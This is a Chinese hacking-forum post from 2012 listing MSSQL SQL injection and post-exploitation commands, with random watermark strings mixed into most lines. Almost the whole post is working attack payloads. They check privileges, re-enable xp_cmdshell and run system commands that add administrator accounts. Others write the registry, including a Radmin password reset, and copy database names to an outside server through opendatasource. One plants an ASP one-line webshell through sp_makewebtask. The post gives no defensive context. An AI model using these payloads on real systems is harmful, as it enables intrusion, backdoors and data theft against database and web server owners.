找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2147|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的5 o" ]3 e, u" x
and 1=(Select IS_MEMBER('db_owner')), N. k% F4 ?. Z
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--6 [: q% p' i7 G# A2 E
% S, s7 Q/ l4 f" q2 p! \
//检测是否有读取某数据库的权限2 w: v0 J0 {3 p" Y
and 1= (Select HAS_DBACCESS('master'))
7 l' I0 u! S5 s7 r# iAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --1 n0 O. f- u7 y' k9 `

6 j- Z" n1 J' L8 v% ]. @3 o5 W0 ]/ l. j& z  M4 D
数字类型7 F( _# C1 d$ p8 i8 I
and char(124)%2Buser%2Bchar(124)=0
' x6 p# c4 i* P; H% z4 Z
4 [" E! @, M! V& @( g7 \字符类型
$ ]( q  u% x9 R: Z' and char(124)%2Buser%2Bchar(124)=0 and ''='
& v* e0 Y# W! a' @
) w( O) C5 L6 B, _, P搜索类型
2 e8 l, G/ r3 L5 ~$ b2 @' and char(124)%2Buser%2Bchar(124)=0 and '%'='
! H1 I. O! K. R/ T# k) J
; j. v( E( u4 d- S% s, Y- t0 x爆用户名, O" ]  x2 c' g2 f  J2 F, T
and user>0
; D5 G: T0 l9 ?0 f# |( r+ x' and user>0 and ''='9 m$ Y; ?' ~* u1 r0 S  |
' s4 h$ l2 U: v# Z( u
检测是否为SA权限
! v4 C4 L- c/ j2 N/ H* band 1=(select IS_SRVROLEMEMBER('sysadmin'));--
- C6 w" `7 @2 `# A$ u6 d! HAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --% F) f) [/ J1 k
1 @/ S4 l8 I! c& a+ J6 S
检测是不是MSSQL数据库
' N5 _" \- q1 K" T: Y$ zand exists (select * from sysobjects);--
) H/ W$ {6 T. T; P# F+ i
& W# @' H) ^/ j; E检测是否支持多行
; v: c% f2 r0 S3 \" f$ j9 Z;declare @d int;--
, B5 l) m6 Q/ ~/ j& ^) u) ^9 C9 ?, L9 y1 j
恢复 xp_cmdshell' f& j& k3 }% \+ P7 w
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
" W' {( m8 q/ I! |5 }
2 ]5 k& ?- T( i1 S0 F4 E
8 ~1 O( v: U% l! n9 j& V1 t$ x& }select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')! o9 J( j8 R6 y8 r* Z/ K, l" E, U; _

( c1 n9 k- U# O( F" y3 P//-----------------------5 p0 v+ d) S' m
//       执行命令; h- [' X2 O+ ]& f0 b6 j) s* F
//-----------------------1 G  _. e! [3 I& T1 d' ^
首先开启沙盘模式:& u# N6 P; V0 j
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
' w  z8 i8 g! |. h* T  m2 Q9 n, ]/ ]' |
然后利用jet.oledb执行系统命令4 d) |% a! ~0 L; p
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')8 R) }5 e. u* i9 A" x

* d; d# q" U* Q2 I9 ?执行命令
) a* _+ f$ w5 V; P;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--: x) V% A4 S2 y1 O, k
0 c4 A' i$ P. p) M, f# V
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) j4 @; [% u  g$ J% H' ^% V$ p+ s, s8 Y6 X$ J
判断xp_cmdshell扩展存储过程是否存在:; [' G) o0 {0 F$ S( `  {
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')1 y2 J4 S* V5 y) U% |' }4 u# z
2 Q8 [9 ~# t) r# b
写注册表
$ W( M% Y% @) E# uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1% I: E2 T9 e5 E+ k/ ^+ p

+ _$ x7 ^. }( K; iREG_SZ
/ Z4 M) R2 t# m' s1 `& ]) B1 B' b7 E* _' M& E  D
读注册表* j' K# r, {& q2 \8 v
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit') _; v$ P! N$ n* m) s- Y
  c7 U$ |& A0 K( U# ?5 f
读取目录内容3 b; b1 h( ~/ Y0 w+ |
exec master..xp_dirtree 'c:\winnt\system32\',1,1% F: e5 ?0 _2 B- q* F- o* X6 V4 w
: `. V$ w1 V% `$ L- `5 v( j

0 n$ a# Z5 g3 [# h1 Y6 N' V- }数据库备份
5 V; \- J2 ~: v9 h, Obackup database pubs to disk = 'c:\123.bak'
: Q* }7 k3 W" m' a/ _
8 I" u  L; @6 |3 D//爆出长度. Y9 R/ N! R3 x4 @# }4 g6 P# Q' |
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
3 L! ]9 N' E5 S7 V3 o2 |" o3 I2 ^: }. _4 a
4 C2 U/ Z% U+ T. k

6 x  t7 H) J7 u8 }* A8 E更改sa口令方法:用sql综合利用工具连接后,执行命令:5 |# h) ]; [; |( g* m. H" T$ w
exec sp_password NULL,'新密码','sa'& B" N5 J) E* p+ @2 F- ]5 o: d
7 W. o; O( l; |& w, |; W# Y! D
添加和删除一个SA权限的用户test:
/ K4 I2 i; ~" Lexec master.dbo.sp_addlogin test,9530772
( [* C( J1 m: r1 j0 a" M1 r! t/ Cexec master.dbo.sp_addsrvrolemember test,sysadmin
. a# A( b* e  c$ L
- j  p5 E8 [; e1 P5 y删除扩展存储过过程xp_cmdshell的语句:
3 i* \, F* |! ~- B/ l" vexec sp_dropextendedproc 'xp_cmdshell') x" }9 h9 j9 f6 }. h/ C
6 J& k' v; ^5 i8 A( f
添加扩展存储过过程
- q4 C4 c  ^, R  TEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll': C: }. }5 e/ H' L
GRANT exec On xp_proxiedadata TO public
1 `0 r3 a! V" x5 J) _) s; o/ v$ s6 H/ m! c" ~8 n' L
) x' W7 \- d! x( s* Z
停掉或激活某个服务。
  b- }4 r0 m# k; g* J9 k# p6 T' E' X" s, }/ e( u" E4 c4 y2 f7 j" N
exec master..xp_servicecontrol 'stop','schedule'
# N0 b& r1 K3 V5 Xexec master..xp_servicecontrol 'start','schedule'
5 v3 G0 t& o; `) \% ~6 |0 [2 s
/ q( F. [2 @8 w2 Bdbo.xp_subdirs
2 B7 B1 f) ?) p! a" ~
5 T- w) w5 z1 B3 V" o" Q5 p只列某个目录下的子目录。- Y9 p7 G& m1 H* ~6 U
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
8 y& w! e1 p0 I* m9 ]8 M( b" q6 X* S
8 D) x+ e# {% o' r) _; {" Kdbo.xp_makecab
& {5 R1 o3 A7 {3 G5 G8 p  C1 J8 t. H5 r
将目标多个档案压缩到某个目标档案之内。
8 \. Y/ N3 c% V8 G/ K% i所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
3 D- n2 z* D, i* d& O0 o$ `
! q/ D: H/ E1 _, }8 w5 j9 u: Adbo.xp_makecab
! |+ j5 M6 i7 O'c:\test.cab','mszip',1,7 x6 ?' _0 t; Y8 p" f7 S4 n' R1 G
'C:\Inetpub\wwwroot\SQLInject\login.asp',; |5 T% {  S! m
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp', ^: a, @  T7 ~

5 v: H& Y- b5 s1 `3 lxp_terminate_process
" ]% \7 ~) {9 u# H8 V- a. r4 h* Y9 I5 J, o" G" O
停掉某个执行中的程序,但赋予的参数是 Process ID。  a7 t6 q0 `& H9 y1 Y+ I
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID3 P8 _# F8 T, M3 V  o

8 c' ?6 X& z; w; Hxp_terminate_process 2484. k* E3 e7 z4 P" n5 H

. J" u7 N! j8 i1 f  S6 Cxp_unpackcab3 V4 E4 N1 J0 o/ u4 l

2 o- v) e7 D/ ^4 k' P7 M9 W& d解开压缩档。
' `7 [/ X5 q$ Y( t
: Y. n- x  B" L: Nxp_unpackcab 'c:\test.cab','c:\temp',1
7 S% l% f7 M+ R# M, a2 A! }# M! z% p* Z8 A" P, u" U
: ^  X  H" p5 T4 g
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
0 u6 g% V% Q, X, t7 d/ ^8 ]. @( f. ^( l8 u9 [8 Y5 M
create database lcx;
& i- E! O) L  I; l: h+ [6 H( hCreate TABLE ku(name nvarchar(256) null);
! i: @' {  S! D6 }" a9 a- WCreate TABLE biao(id int NULL,name nvarchar(256) null);6 X. g  E3 R. x& [7 I4 J6 B9 y6 A
5 G/ a4 r( g( k8 P' B, P/ q& H; L
//得到数据库名
  M! a5 \) a1 l. binsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
+ \% p6 B2 U! ~' R" T2 C" ^" y! x% t
% h. ~# ]8 k6 j% H
//在Master中创建表,看看权限怎样3 K( y+ S8 Q! `* E; n3 x
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
. D% k2 S! X2 }4 Q% ~$ g" M! d, n% _0 s' P
用 sp_makewebtask直接在web目录里写入一句话马:
. D; w( b, [' l. khttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--0 C1 Y6 C) a& U

) I5 {( }( e" h  `5 l//更新表内容  g* q0 c# a# p, a( x
Update films SET kind = 'Dramatic' Where id = 123
  m7 B3 d0 Y+ X8 ^/ V2 {$ u$ J* T- p  Q0 a. o. a7 P4 u0 m
//删除内容
4 b- S8 h, t8 ?( Q( C# ?delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表